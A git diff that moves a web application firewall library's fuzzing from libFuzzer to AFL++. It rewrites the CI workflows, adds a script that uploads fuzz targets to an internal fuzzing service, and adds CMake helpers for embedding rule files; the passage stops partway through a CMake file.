diff --git a/.github/workflows/fuzz.yml b/.github/workflows/fuzz.yml index 476adcfed..55035bbd5 100644 --- a/.github/workflows/fuzz.yml +++ b/.github/workflows/fuzz.yml @@ -5,129 +5,182 @@ on: branches: - "**" push: - branches: [ master ] + branches: [master] tags: - "*" schedule: - - cron: 30 0 * * * + - cron: 30 0 * * * workflow_dispatch: inputs: duration: - description: 'Duration of the fuzzing run in seconds' + description: "Duration of the fuzzing run in seconds" required: true default: "60" type: string concurrency: group: ${{ github.workflow }}-${{ github.event.pull_request.number || github.ref }} cancel-in-progress: true + jobs: - # TODO: build all fuzzers first, then run independently - global-fuzzer: + build: runs-on: ubuntu-latest + outputs: + fuzzers: ${{ steps.list-fuzzers.outputs.fuzzers }} steps: - uses: actions/checkout@v4 with: submodules: recursive - - name: Install deps + - name: Install AFL++ and dependencies run: | - DEBIAN_FRONTEND="noninteractive" sudo apt-get -y remove python3-lldb-14 - sudo .github/workflows/scripts/llvm.sh 17 - DEBIAN_FRONTEND="noninteractive" sudo apt-get -y install libfuzzer-17-dev + sudo .github/workflows/scripts/llvm.sh 19 + sudo apt-get install -y build-essential cmake git curl python3 python3-pip ninja-build libssl-dev libcurl4-openssl-dev zlib1g-dev xxd - - name: Build - run: ./fuzzer/global/build.sh + - name: Install AFL++ + run: | + git clone https://github.com/AFLplusplus/AFLplusplus.git /tmp/AFLplusplus + cd /tmp/AFLplusplus + git checkout b89727bea903aec80d003b6764fb53c232d33d95 + make -j$(nproc) all + sudo make install - - name: Run fuzzer - run: ./fuzzer/global/run.sh ${{ github.event.inputs.duration }} + - name: Install afl-cov-fast + run: | + git clone --recursive https://github.com/airbus-seclab/afl-cov-fast.git /opt/afl-cov-fast + cd /opt/afl-cov-fast + git checkout 7a96b578bb227e874bf75f8cb759e8ac2b180453 + pip3 install -r requirements.txt + + - name: Create workspace and build + env: + CC: afl-clang-lto 
+ CXX: afl-clang-lto++ + AFL_USE_ASAN: 1 + run: | + # Create /workspace and copy everything there + sudo mkdir -p /workspace + sudo cp -r . /workspace/ + sudo chown -R $(whoami):$(whoami) /workspace + cd /workspace + + # Run the build script logic directly + python3 fuzzer/global/scripts/build_corpus.py + + mkdir -p build + cd build + cmake .. \ + -DCMAKE_BUILD_TYPE=Debug \ + -DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer -O3 -g -fprofile-instr-generate -fcoverage-mapping" \ + -DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer -O3 -g -fprofile-instr-generate -fcoverage-mapping" + make -j$(nproc) + + cd ../fuzzer + mkdir -p build + cd build + cmake .. \ + -DCMAKE_BUILD_TYPE=Debug \ + -DLIBDDWAF_BUILD_FUZZER=ON \ + -DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer -O3 -g -fprofile-instr-generate -fcoverage-mapping" \ + -DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer -O3 -g -fprofile-instr-generate -fcoverage-mapping" + make -j$(nproc) + + - name: List available fuzzers + id: list-fuzzers + run: | + fuzzers=$(grep -A 20 "ALL_FUZZERS=(" fuzzer/docker/run_fuzzers.sh | grep -E '^\s*"[^"]*"' | sed 's/.*"\([^"]*\)".*/\1/' | jq -R -s -c 'split("\n")[:-1]') + echo "fuzzers=$fuzzers" >> $GITHUB_OUTPUT + echo "Found fuzzers: $fuzzers" + + - name: Package AFL++ and coverage tools + run: | + # Create AFL++ package + mkdir -p /tmp/afl-package/bin + mkdir -p /tmp/afl-package/opt - - name: Log - if: ${{ always() }} - run: grep -v -f fuzzer/global/scripts/report-negative-patterns.txt fuzzer/global/fuzz-*.log + # Package AFL++ binaries + cp /usr/local/bin/afl-* /tmp/afl-package/bin/ 2>/dev/null || true + cp /opt/AFLplusplus/afl-* /tmp/afl-package/bin/ 2>/dev/null || true - - name: Show coverage - run: ./fuzzer/global/scripts/show_coverage.sh 40 || true + # Package afl-cov-fast + cp -r /opt/afl-cov-fast /tmp/afl-package/opt/ - - name: Compress artifact - if: ${{ always() }} - run: tar -czvf fuzzing.tar.gz fuzzer/global/ + echo "AFL++ 
binaries:" + ls -la /tmp/afl-package/bin/ + echo "Coverage tools:" + ls -la /tmp/afl-package/opt/ - - name: Artifact + - name: Upload build artifacts uses: actions/upload-artifact@v4 - if: ${{ always() }} with: - name: fuzzing-data - path: fuzzing.tar.gz - local-fuzzer: + name: fuzzer-binaries + path: | + /workspace/fuzzer/build/*_fuzz + /workspace/build/ + /workspace/fuzzer/global/scripts/ + retention-days: 1 + + - name: Upload AFL++ binaries + uses: actions/upload-artifact@v4 + with: + name: afl-binaries + path: /tmp/afl-package/ + retention-days: 1 + + fuzzing: + needs: build runs-on: ubuntu-latest strategy: fail-fast: false matrix: - variant: - - fuzzer: uri_parse - params: "" - - fuzzer: ssrf_detector - params: "" - - fuzzer: lfi_detector - params: "" - - fuzzer: sql_tokenizer - params: "--dialect=mysql" - - fuzzer: sql_tokenizer - params: "--dialect=postgresql" - - fuzzer: sql_tokenizer - params: "--dialect=sqlite" - - fuzzer: sql_tokenizer - params: "--dialect=standard" - - fuzzer: sqli_detector - params: "--dialect=mysql" - - fuzzer: sqli_detector - params: "--dialect=postgresql" - - fuzzer: sqli_detector - params: "--dialect=sqlite" - - fuzzer: sqli_detector - params: "--dialect=standard" - - fuzzer: shell_tokenizer - params: "" - - fuzzer: shi_detector_string - params: "" - - fuzzer: shi_detector_array - params: "" - - fuzzer: cmdi_detector - params: "" - - fuzzer: sha256 - params: "" - - fuzzer: http_endpoint_fingerprint - params: "" - - fuzzer: http_header_fingerprint - params: "" - - fuzzer: http_network_fingerprint - params: "" - - fuzzer: session_fingerprint - params: "" - - fuzzer: jwt_decode - params: "" + fuzzer: ${{ fromJson(needs.build.outputs.fuzzers) }} steps: - uses: actions/checkout@v4 with: submodules: recursive - - name: Install deps + - name: Install runtime dependencies run: | - DEBIAN_FRONTEND="noninteractive" sudo apt-get -y remove python3-lldb-14 - sudo .github/workflows/scripts/llvm.sh 17 - DEBIAN_FRONTEND="noninteractive" sudo 
apt-get -y install libfuzzer-17-dev + # Install only runtime dependencies (no build tools needed) + sudo .github/workflows/scripts/llvm.sh 19 - - name: Build - env: - CC: clang-17 - CXX: clang++-17 + - name: Download AFL++ binaries + uses: actions/download-artifact@v4 + with: + name: afl-binaries + path: /tmp/afl-package + + - name: Install AFL++ binaries and coverage tools run: | - mkdir build ; cd build - cmake -DCMAKE_VERBOSE_MAKEFILE=1 -DCMAKE_BUILD_TYPE=RelWithDebInfo .. - make -j $(nproc) ${{ matrix.variant.fuzzer }}_fuzzer - cp fuzzer/${{ matrix.variant.fuzzer }}_fuzzer ../fuzzer/${{ matrix.variant.fuzzer }} + # Install AFL++ binaries + sudo cp /tmp/afl-package/bin/* /usr/local/bin/ + sudo chmod +x /usr/local/bin/afl-* + + # Install afl-cov-fast + sudo cp -r /tmp/afl-package/opt/afl-cov-fast /opt/ + cd /opt/afl-cov-fast + pip3 install -r requirements.txt + + afl-fuzz --help || echo "AFL++ installed successfully" + + - name: Setup workspace and download artifacts + run: | + sudo mkdir -p /workspace + sudo cp -r . 
/workspace/ + sudo chown -R $(whoami):$(whoami) /workspace + sudo chown -R $(whoami):$(whoami) /opt + + - name: Download build artifacts + uses: actions/download-artifact@v4 + with: + name: fuzzer-binaries + path: /workspace - name: Run fuzzer + env: + AFL_SKIP_CPUFREQ: 1 + AFL_I_DONT_CARE_ABOUT_MISSING_CRASHES: 1 + AFL_FAST_CAL: 1 run: | - cd fuzzer/${{ matrix.variant.fuzzer }} - ./${{ matrix.variant.fuzzer }}_fuzzer ${{ matrix.variant.params }} -max_total_time=${{ github.event.inputs.duration || 300 }} corpus/ + cd /workspace + chmod +x fuzzer/build/*_fuzz 2>/dev/null || true + ./fuzzer/docker/run_fuzzers.sh ${{ matrix.fuzzer }} diff --git a/.gitignore b/.gitignore index cb82b5acf..fbbd582c6 100644 --- a/.gitignore +++ b/.gitignore @@ -1,22 +1,25 @@ /Release /Debug /build +build/ +**/build/ PowerWAF.xcodeproj CMakeLists.txt.user compile_commands.json .cache .DS_Store + +/src/version.hpp +/tests/common/base_path.hpp tests/default.profraw perf/test_files/parsed_* perf/test_files/breakdown.numbers -/fuzzer/global/build /fuzzer/global/venv -/fuzzer/global/corpus - /fuzzer/global/sample_rules.yml +/fuzzer/e2e/src/ruleset/sample_rules.json /fuzzer/global/sample_dict.txt /fuzzer/global/fuzzer /fuzzer/global/libddwaf.a @@ -26,14 +29,32 @@ perf/test_files/breakdown.numbers /fuzzer/global/coverage.html /fuzzer/global/fuzz-*.log /fuzzer/global/results/crash-* +default.profraw +# AFL++ temporary files +*.cur_input +.afl_* +*.fuzz_* -/fuzzer/*/corpus/* -!/fuzzer/*/corpus/corpus-* +# Usual folders for testing afl fuzzers +o/ +i/ -/src/version.hpp -/tests/common/base_path.hpp +core.* +core + +# Sanitizer outputs +*.dSYM/ *.trace +# Fuzz binary are suffixed with _fuzz +*_fuzz +!*_fuzz.cpp + +CMakeCache.txt +CMakeFiles/ +cmake_install.cmake +Makefile + .vscode *.swp *.swo diff --git a/.gitlab-ci.yml b/.gitlab-ci.yml index c82a6e809..077cb2237 100644 --- a/.gitlab-ci.yml +++ b/.gitlab-ci.yml @@ -1,5 +1,7 @@ stages: - benchmarks + - fuzzing -include: ".gitlab/benchmarks.yml" - 
+include: + - ".gitlab/benchmarks.yml" + - ".gitlab/fuzzing.yml" diff --git a/.gitlab/fuzzing.yml b/.gitlab/fuzzing.yml new file mode 100644 index 000000000..a5c8fbfae --- /dev/null +++ b/.gitlab/fuzzing.yml @@ -0,0 +1,58 @@ +variables: + # Use the same base image as benchmarks as we know it should be able to build the fuzzers + BASE_CI_IMAGE: 486234852809.dkr.ecr.us-east-1.amazonaws.com/ci/benchmarking-platform:libddwaf + +run-fuzzing: + stage: fuzzing + tags: ["runner:apm-k8s-tweaked-metal"] + image: $BASE_CI_IMAGE + timeout: 30m + rules: + - if: '$CI_COMMIT_REF_NAME == "master" && $CI_PIPELINE_SOURCE == "schedule"' + - if: '$CI_COMMIT_REF_NAME == "master" && $CI_PIPELINE_SOURCE == "push"' + - if: '$CI_PIPELINE_SOURCE == "web"' + when: manual + before_script: | + VAULT_VERSION=1.20.2 + wget https://releases.hashicorp.com/vault/${VAULT_VERSION}/vault_${VAULT_VERSION}_linux_amd64.zip + unzip vault_${VAULT_VERSION}_linux_amd64.zip + mv vault /usr/bin/vault + chmod +x /usr/bin/vault + export PATH=/usr/bin:$PATH + + # TODO: MOVE THIS TO THE BASE IMAGE BUILD + + wget -O - https://apt.llvm.org/llvm-snapshot.gpg.key | apt-key add - + echo 'deb http://apt.llvm.org/jammy/ llvm-toolchain-jammy-19 main' | tee /etc/apt/sources.list.d/llvm-toolchain.list + apt-get update + + # Install dependencies matching your Dockerfile + .github/workflows/scripts/llvm.sh 19 + apt-get install -y build-essential cmake git curl python3 python3-pip ninja-build libssl-dev libcurl4-openssl-dev zlib1g-dev xxd + + # Install AFL++ + git clone https://github.com/AFLplusplus/AFLplusplus.git /tmp/AFLplusplus + cd /tmp/AFLplusplus + git checkout b89727bea903aec80d003b6764fb53c232d33d95 + make -j$(nproc) all + make install + + # Install afl-cov-fast + git clone --recursive https://github.com/airbus-seclab/afl-cov-fast.git /opt/afl-cov-fast + cd /opt/afl-cov-fast + git checkout 7a96b578bb227e874bf75f8cb759e8ac2b180453 + pip3 install -r requirements.txt + + script: | + # TODO: figure out what's the actual 
path to the source code instead of hardcoding it? + # Copy source code to /workspace where the build scripts expect it + mv /go/src/github.com/DataDog/apm-reliability/libddwaf /workspace + cd /workspace + echo "Starting fuzzing infrastructure setup..." + echo "Current commit: $CI_COMMIT_SHA" + echo "Current branch: $CI_COMMIT_REF_NAME" + echo "Current working directory: $(pwd)" + ls -la + python3 -m pip install requests + python3 /workspace/ci/scripts/fuzz_infra.py + echo "✅ Fuzzing setup completed successfully" diff --git a/CMakeLists.txt b/CMakeLists.txt index 8df874150..2dc19ee40 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -36,6 +36,7 @@ message(STATUS "Build type: ${CMAKE_BUILD_TYPE}") option(LIBDDWAF_BUILD_SHARED "Build shared library" ON) option(LIBDDWAF_BUILD_STATIC "Build shared library" ON) option(LIBDDWAF_TESTING "Load test subdirectories and targets" ON) +option(LIBDDWAF_BUILD_FUZZER "Build fuzzer targets (requires special setup)" OFF) option(LIBDDWAF_TEST_COVERAGE "Do coverage if possible" OFF) option(LIBDDWAF_VECTORIZED_TRANSFORMERS "Enable vectorization for transformers" ON) option(LIBDDWAF_ENABLE_LTO "Enable link-time optimisation" OFF) @@ -126,10 +127,13 @@ if (LIBDDWAF_TESTING) add_subdirectory(tests EXCLUDE_FROM_ALL) add_subdirectory(validator EXCLUDE_FROM_ALL) add_subdirectory(benchmark EXCLUDE_FROM_ALL) - add_subdirectory(fuzzer EXCLUDE_FROM_ALL) add_subdirectory(tools EXCLUDE_FROM_ALL) add_subdirectory(examples EXCLUDE_FROM_ALL) include(cmake/clang-tidy.cmake) include(cmake/clang-format.cmake) endif() + +if (LIBDDWAF_BUILD_FUZZER) + add_subdirectory(fuzzer EXCLUDE_FROM_ALL) +endif() diff --git a/ci/scripts/fuzz_infra.py b/ci/scripts/fuzz_infra.py new file mode 100644 index 000000000..7157332a6 --- /dev/null +++ b/ci/scripts/fuzz_infra.py @@ -0,0 +1,189 @@ +""" +Helper for running fuzz targets in the internal fuzzing infrastructure. 
+""" + +import os +import sys +import base64 + +import requests + +# replace me to "k9-libddwaf" once CHAOSPLT-991 is fixed. Lets not send empty bugreport to end users slacks +SLACK_CHANNEL = "fuzzing-ops" +REPOSITORY_URL = "https://github.com/DataDog/libddwaf" + +BUILD_BASE_PATH = "/workspace/fuzzer/build" +FUZZER_BASE_PATH = "/workspace/fuzzer" +CORPUS_PATH_PATTERN = "/workspace/fuzzer/{}/corpus" +API_URL = "https://fuzzing-api.us1.ddbuild.io/api/v1" +MAX_PKG_NAME_LENGTH = 50 + +def build_and_upload_fuzz(team="k9-libddwaf", core_count=2, duration=3600, proc_count=2, memory=4): + """ + This builds and uploads fuzz targets to the internal fuzzing infrastructure. + It needs to be passed the -fuzz flag in order to build the fuzz with efficient coverage guidance. + """ + + git_sha = os.popen("git rev-parse HEAD").read().strip() + + build_all() + + binaries = search_fuzzers(BUILD_BASE_PATH) + print(f"✅ Found {len(binaries)} fuzzers (e.g: {binaries[:5]}...)") + for binary in binaries: + pkgname = get_package_name(binary) + build_full_path = os.path.join(BUILD_BASE_PATH, binary) + print(f"Handling {pkgname} ({binary}) build_full_path: {build_full_path}") + if not os.path.exists(build_full_path): + print(f'❌ Build file {build_full_path} does not exist. Skipping...') + continue + + print(f"Uploading corpus for {pkgname} ({binary})...") + has_error = upload_corpus(pkgname, binary) + if has_error: + print(f'❌ Failed to upload corpus for {pkgname} ({binary}). Skipping fuzzer start...') + else: + print(f"✅ Uploaded corpus for {pkgname} ({binary})") + + print(f"Uploading binary for {pkgname} ({binary})...") + has_error = upload_binary(pkgname, binary, git_sha) + if has_error: + print(f'❌ Failed to upload binary for {pkgname}. 
Aborting') + return + else: + print(f"✅ Uploaded binary for {pkgname} ({binary})") + + print(f"Starting fuzzer for {pkgname} ({binary})...") + has_error = create_fuzzer(pkgname, binary, git_sha, core_count, duration, proc_count, memory, team, SLACK_CHANNEL, REPOSITORY_URL) + if has_error: + print(f'❌ Failed to create fuzzer for {pkgname} ({binary})') + else: + print(f"✅ Fuzzer created for {pkgname} ({binary})") + +def upload_corpus(pkgname, binary) -> bool: + has_errors = False + corpus_files_path = search_corpus(binary.replace("_fuzz", "")) + print(f'Uploading corpus (count: {len(corpus_files_path)}) for {pkgname} ({binary})...') + + # Get headers only once, so we don't have to call vault every time we upload a file + # Our current api doesn't support archive / batch upload yet (WIP) + headers = get_headers() + for file in corpus_files_path: + with open(file, "rb") as f: + data = f.read() + data = { + "content": base64.b64encode(data).decode("utf-8"), + } + try: + response = requests.post(f"{API_URL}/apps/{pkgname}/inputs", headers=headers, json=data, timeout=30) + response.raise_for_status() + except Exception as e: + print(f'❌ Failed to upload file for corpus, {pkgname} ({binary}): {e}') + print("Ignoring this file and continuing...") + has_errors = True + continue + + print(f'✅ Uploaded corpus for {pkgname} ({binary})...') + return has_errors + +def build_all(): + print("Building all fuzzers in path: ", os.getcwd()) + os.system("/workspace/fuzzer/docker/build.sh") + print("✅ Built all fuzzers") + +def get_package_name(binary): + return "libddwaf-" + binary.replace("_fuzz", "")[:MAX_PKG_NAME_LENGTH].replace("_", "-") # limit to 50 chars + +def search_fuzzers(directory): + def is_executable(file_path): + return os.path.isfile(file_path) and os.access(file_path, os.X_OK) + + binaries = [] + if os.path.isdir(directory): + for fname in os.listdir(directory): + fpath = os.path.join(directory, fname) + print(f"Checking fuzzer at path: {fpath}") + if not 
is_executable(fpath): + print(f"Skipping {fname} because it's not executable") + continue + if not fname.endswith("_fuzz"): + print(f"Skipping {fname} because it doesn't end with _fuzz") + continue + print(f"Adding {fname} to list of fuzzers") + binaries.append(fname) + return binaries + +# search for all file in the "corpus" subdirectory of the app, return a list of files +def search_corpus(appname): + corpus_path = CORPUS_PATH_PATTERN.format(appname) + print(f"Searching for corpus in {corpus_path}") + corpus_files_path = [] + if os.path.isdir(corpus_path): + for filename in os.listdir(corpus_path): + file_path = os.path.join(corpus_path, filename) + if os.path.isfile(file_path): + corpus_files_path.append(file_path) + + return corpus_files_path + +def create_fuzzer(pkgname, binary, git_sha, core_count, duration, proc_count, memory, team, slack_channel, repository_url) -> bool: + print(f'Starting fuzzer for {pkgname} ({binary})...') + # Start new fuzzer + run_payload = { + "app": pkgname, + "debug": False, + "version": git_sha, + "core_count": core_count, + "duration": duration, + "type": "aflpp", + "binary": binary, + "team": team, + "process_count": proc_count, + "memory": memory, + "slack_channel": SLACK_CHANNEL, + "repository_url": "https://github.com/DataDog/libddwaf", + } + try: + response = requests.post(f"{API_URL}/apps/{pkgname}/fuzzers", headers=get_headers(), json=run_payload, timeout=30) + response.raise_for_status() + print(f'✅ Started fuzzer for {pkgname} ({binary})...') + print(response.json()) + except Exception as e: + print(f'❌ Failed to start fuzzer for {pkgname} ({binary}): {e}') + return True + + return False + +def upload_binary(pkgname, binary, git_sha) -> bool: + try: + # Get presigned URL so we can use s3 uploading + print(f'Getting presigned URL for {pkgname}...') + presigned_response = requests.post( + f"{API_URL}/apps/{pkgname}/builds/{git_sha}/url", headers=get_headers(), timeout=30 + ) + presigned_response.raise_for_status() + 
presigned_url = presigned_response.json()["data"]["url"] + + print(f'Uploading {pkgname} ({binary}) for {git_sha}...') + # Upload file to presigned URL + build_full_path = os.path.join(BUILD_BASE_PATH, binary) + with open(build_full_path, 'rb') as f: + upload_response = requests.put(presigned_url, data=f, timeout=300) + upload_response.raise_for_status() + except Exception as e: + print(f'❌ Failed to upload binary for {pkgname} ({binary}): {e}') + return True + return False + +def get_headers(): + auth_header = os.popen("vault read -field=token identity/oidc/token/security-fuzzing-platform").read().strip() + return {"Authorization": f"Bearer {auth_header}", "Content-Type": "application/json"} + +if __name__ == "__main__": + print("🚀 Starting fuzzing infrastructure setup...") + try: + build_and_upload_fuzz() + print("✅ Fuzzing infrastructure setup completed successfully!") + except Exception as e: + print(f"❌ Failed to set up fuzzing infrastructure: {e}") + sys.exit(1) \ No newline at end of file diff --git a/cmake/embed_resources.cmake b/cmake/embed_resources.cmake new file mode 100644 index 000000000..01e2089f7 --- /dev/null +++ b/cmake/embed_resources.cmake @@ -0,0 +1,91 @@ +# Function to embed JSON files as C++ string literals using raw string literals +function(embed_json_files target_name) + set(oneValueArgs OUTPUT_FILE NAMESPACE) + set(multiValueArgs JSON_FILES) + cmake_parse_arguments(EMBED "" "${oneValueArgs}" "${multiValueArgs}" ${ARGN}) + + # Create the output directory + get_filename_component(OUTPUT_DIR ${EMBED_OUTPUT_FILE} DIRECTORY) + file(MAKE_DIRECTORY ${OUTPUT_DIR}) + + # Start building the header content + set(HEADER_CONTENT "// Auto-generated by CMake - DO NOT EDIT\n") + string(APPEND HEADER_CONTENT "#pragma once\n") + string(APPEND HEADER_CONTENT "#include \n") + string(APPEND HEADER_CONTENT "#include \n\n") + string(APPEND HEADER_CONTENT "namespace ${EMBED_NAMESPACE} {\n\n") + + # Process each JSON file + foreach(JSON_FILE ${EMBED_JSON_FILES}) 
+ # Get the filename without extension for the variable name + get_filename_component(FILE_NAME ${JSON_FILE} NAME_WE) + + # Read the JSON file content + file(READ ${JSON_FILE} JSON_CONTENT) + + # Use raw string literal to avoid escaping issues (default being `")`, any json containing that would break) + # Generate a unique delimiter to avoid conflicts + string(RANDOM LENGTH 8 ALPHABET "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" DELIMITER) + set(RAW_DELIMITER "JSON_${DELIMITER}") + + # Add the raw string literal to header + string(APPEND HEADER_CONTENT "const std::string_view ${FILE_NAME}_json = R\"${RAW_DELIMITER}(${JSON_CONTENT})${RAW_DELIMITER}\";\n\n") + endforeach() + + + string(APPEND HEADER_CONTENT "} // namespace ${EMBED_NAMESPACE}\n") + + # Write the header file + file(WRITE ${EMBED_OUTPUT_FILE} "${HEADER_CONTENT}") + + # Add the generated file as a target dependency + add_custom_target(${target_name}_resources + DEPENDS ${EMBED_OUTPUT_FILE} + COMMENT "Generating embedded resources for ${target_name}" + ) +endfunction() + +# Function to embed YAML files as C++ string literals using raw string literals +function(embed_yaml_files target_name) + set(oneValueArgs OUTPUT_FILE NAMESPACE) + set(multiValueArgs YAML_FILES) + cmake_parse_arguments(EMBED "" "${oneValueArgs}" "${multiValueArgs}" ${ARGN}) + + # Create the output directory + get_filename_component(OUTPUT_DIR ${EMBED_OUTPUT_FILE} DIRECTORY) + file(MAKE_DIRECTORY ${OUTPUT_DIR}) + + # Start building the header content + set(HEADER_CONTENT "// Auto-generated by CMake - DO NOT EDIT\n") + string(APPEND HEADER_CONTENT "#pragma once\n") + string(APPEND HEADER_CONTENT "#include \n\n") + string(APPEND HEADER_CONTENT "namespace ${EMBED_NAMESPACE} {\n\n") + + # Process each YAML file + foreach(YAML_FILE ${EMBED_YAML_FILES}) + # Get the filename without extension for the variable name + get_filename_component(FILE_NAME ${YAML_FILE} NAME_WE) + + # Read the YAML file content + file(READ ${YAML_FILE} YAML_CONTENT) + + # Use 
raw string literal to avoid escaping issues + # Generate a unique delimiter to avoid conflicts + string(RANDOM LENGTH 8 ALPHABET "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" DELIMITER) + set(RAW_DELIMITER "YAML_${DELIMITER}") + + # Add the raw string literal to header + string(APPEND HEADER_CONTENT "const std::string_view ${FILE_NAME}_yaml = R\"${RAW_DELIMITER}(${YAML_CONTENT})${RAW_DELIMITER}\";\n\n") + endforeach() + + string(APPEND HEADER_CONTENT "} // namespace ${EMBED_NAMESPACE}\n") + + # Write the header file + file(WRITE ${EMBED_OUTPUT_FILE} "${HEADER_CONTENT}") + + # Add the generated file as a target dependency + add_custom_target(${target_name}_resources + DEPENDS ${EMBED_OUTPUT_FILE} + COMMENT "Generating embedded YAML resources for ${target_name}" + ) +endfunction() \ No newline at end of file diff --git a/fuzzer/CMakeLists.txt b/fuzzer/CMakeLists.txt index c86ceb8df..4b7910ac7 100644 --- a/fuzzer/CMakeLists.txt +++ b/fuzzer/CMakeLists.txt @@ -1,30 +1,190 @@ -MACRO(GET_DIRS subdirs parent) - FILE(GLOB children RELATIVE ${parent} ${parent}/*) - SET(subdirs "") - FOREACH(child ${children}) - IF(IS_DIRECTORY ${parent}/${child}) - LIST(APPEND subdirs ${child}) - ENDIF() - ENDFOREACH() -ENDMACRO() - -GET_DIRS(subdirs ${CMAKE_CURRENT_SOURCE_DIR}) - -set(LINK_COMPILE_FLAGS -fsanitize=fuzzer,address,undefined,leak -fprofile-instr-generate -fcoverage-mapping) - -gen_objects(fuzzer-common) -target_compile_options(fuzzer-common PRIVATE ${LINK_COMPILE_FLAGS}) - -foreach(dir ${subdirs}) - set(FUZZER_NAME "${dir}_fuzzer") - file(GLOB_RECURSE FUZZER_SOURCE ${dir}/src/*.cpp) - add_executable(${FUZZER_NAME} ${FUZZER_SOURCE}) - - set_target_properties(${FUZZER_NAME} PROPERTIES - COMPILE_FLAGS ${LINK_COMPILE_FLAGS} - LINK_FLAGS ${LINK_COMPILE_FLAGS}) - - target_include_directories(${FUZZER_NAME} PRIVATE ${LIBDDWAF_PUBLIC_INCLUDES} ${LIBDDWAF_PRIVATE_INCLUDES} ${CMAKE_CURRENT_SOURCE_DIR}/common/) - target_link_libraries(${FUZZER_NAME} PRIVATE fuzzer-common lib_yamlcpp) 
+cmake_minimum_required(VERSION 3.16) +project(libddwaf_afl_fuzzers) + +set(CMAKE_CXX_STANDARD 20) +set(CMAKE_CXX_STANDARD_REQUIRED ON) + +# Check if we're using an AFL++ compiler for fuzzing +# AFL++ fuzzers require afl-clang-fast, afl-clang-lto, or similar AFL-instrumented compilers +get_filename_component(COMPILER_NAME ${CMAKE_CXX_COMPILER} NAME) +if(NOT (COMPILER_NAME MATCHES "afl-clang" OR COMPILER_NAME MATCHES "afl\\+\\+")) + message(FATAL_ERROR + "AFL++ fuzzer build detected but compiler '${COMPILER_NAME}' is not an AFL compiler. " + "For proper fuzzing instrumentation, use afl-clang-fast, afl-clang-lto, or afl-clang-lto++. " + "Set CC=afl-clang-lto and CXX=afl-clang-lto++ before running cmake." + ) +endif() + +# Include our resource embedding function +include(${CMAKE_SOURCE_DIR}/../cmake/embed_resources.cmake) + +# Include directories will be applied per-target using LIBDDWAF variables from parent project +# Define the same variables as in objects.cmake but for the fuzzer context +set(LIBDDWAF_PUBLIC_INCLUDES ${CMAKE_SOURCE_DIR}/../include) +set(LIBDDWAF_PRIVATE_INCLUDES + ${CMAKE_SOURCE_DIR}/../src + ${CMAKE_SOURCE_DIR}/../src/vendor + ${CMAKE_SOURCE_DIR}/../src/vendor/libinjection/src/ + ${CMAKE_SOURCE_DIR}/../src/vendor/radixlib/ + ${CMAKE_SOURCE_DIR}/../src/vendor/lua-aho-corasick/ + ${CMAKE_SOURCE_DIR}/../src/vendor/utf8proc/ + ${CMAKE_SOURCE_DIR}/../src/vendor/re2/ +) + +# Add libddwaf as a dependency (assuming it's built in parent directory) +set(LIBDDWAF_BUILD_DIR "${CMAKE_SOURCE_DIR}/../build") +set(LIBDDWAF_SRC_DIR "${CMAKE_SOURCE_DIR}/../src") + +# Add the libddwaf library path +link_directories(${LIBDDWAF_BUILD_DIR}) + +# Add third_party dependencies (including RapidJSON) only if not already included +if(NOT TARGET lib_rapidjson) + add_subdirectory(../third_party third_party EXCLUDE_FROM_ALL) +endif() + +# Function to create a fuzzer target +function(add_afl_fuzzer target_name source_files) + add_executable(${target_name} ${source_files}) + + # 
Apply include directories to the target + target_include_directories(${target_name} + PUBLIC ${LIBDDWAF_PUBLIC_INCLUDES} + PRIVATE ${LIBDDWAF_PRIVATE_INCLUDES} + PRIVATE ${CMAKE_CURRENT_SOURCE_DIR}/common + ) + + # Link against necessary libraries + target_link_libraries(${target_name} + ${LIBDDWAF_BUILD_DIR}/libddwaf.a + lib_rapidjson + pthread + ) + + # Special handling for global fuzzer - needs YAML-CPP + if(${target_name} STREQUAL "global_fuzz") + target_link_libraries(${target_name} lib_yamlcpp) + endif() + # Add the json_utils.cpp source to the target + target_sources(${target_name} PRIVATE + ../tests/common/json_utils.cpp + ) + + # Include tests directory for json_utils.hpp + target_include_directories(${target_name} PRIVATE + ../tests + ) + + # Special handling for e2e fuzzer - embed JSON configs + if(${target_name} STREQUAL "e2e_fuzz") + # Find all JSON files in the e2e/src/ruleset directory + file(GLOB E2E_JSON_FILES "${CMAKE_CURRENT_SOURCE_DIR}/e2e/src/ruleset/*.json") + + # Generate embedded resources header + set(EMBEDDED_HEADER "${CMAKE_BINARY_DIR}/generated/embedded_configs.hpp") + embed_json_files(${target_name} + OUTPUT_FILE ${EMBEDDED_HEADER} + NAMESPACE "embedded_configs" + JSON_FILES ${E2E_JSON_FILES} + ) + + # Add the generated header to include path + target_include_directories(${target_name} PRIVATE ${CMAKE_BINARY_DIR}/generated) + + # Make sure the embedded resources are generated before building + add_dependencies(${target_name} ${target_name}_resources) + endif() + + # Special handling for global fuzzer - embed YAML config + if(${target_name} STREQUAL "global_fuzz") + # Find the sample_rules.yml file in the global directory + set(GLOBAL_YAML_FILE "${CMAKE_CURRENT_SOURCE_DIR}/global/sample_rules.yml") + + # Generate embedded resources header + set(EMBEDDED_HEADER "${CMAKE_BINARY_DIR}/generated/embedded_rules.hpp") + embed_yaml_files(${target_name} + OUTPUT_FILE ${EMBEDDED_HEADER} + NAMESPACE "embedded_rules" + YAML_FILES ${GLOBAL_YAML_FILE} 
+ ) + + # Add the generated header to include path + target_include_directories(${target_name} PRIVATE ${CMAKE_BINARY_DIR}/generated) + + # Make sure the embedded resources are generated before building + add_dependencies(${target_name} ${target_name}_resources) + endif() + + # AFL++ instrumentation is handled automatically by afl compiler + # Set output directory + set_target_properties(${target_name} PROPERTIES + RUNTIME_OUTPUT_DIRECTORY ${CMAKE_BINARY_DIR} + ) +endfunction() + +# Create fuzzer targets +# Find all fuzzer targets in individual directories with src/main.cpp structure +file(GLOB FUZZER_SOURCES "*/src/main.cpp") + +set(FUZZER_TARGETS "") +set(CORPUS_DIRS "") + +foreach(FUZZER_SOURCE ${FUZZER_SOURCES}) + # Extract the directory name (fuzzer name) from the path + get_filename_component(FUZZER_DIR ${FUZZER_SOURCE} DIRECTORY) + get_filename_component(FUZZER_NAME ${FUZZER_DIR} DIRECTORY) + get_filename_component(FUZZER_NAME ${FUZZER_NAME} 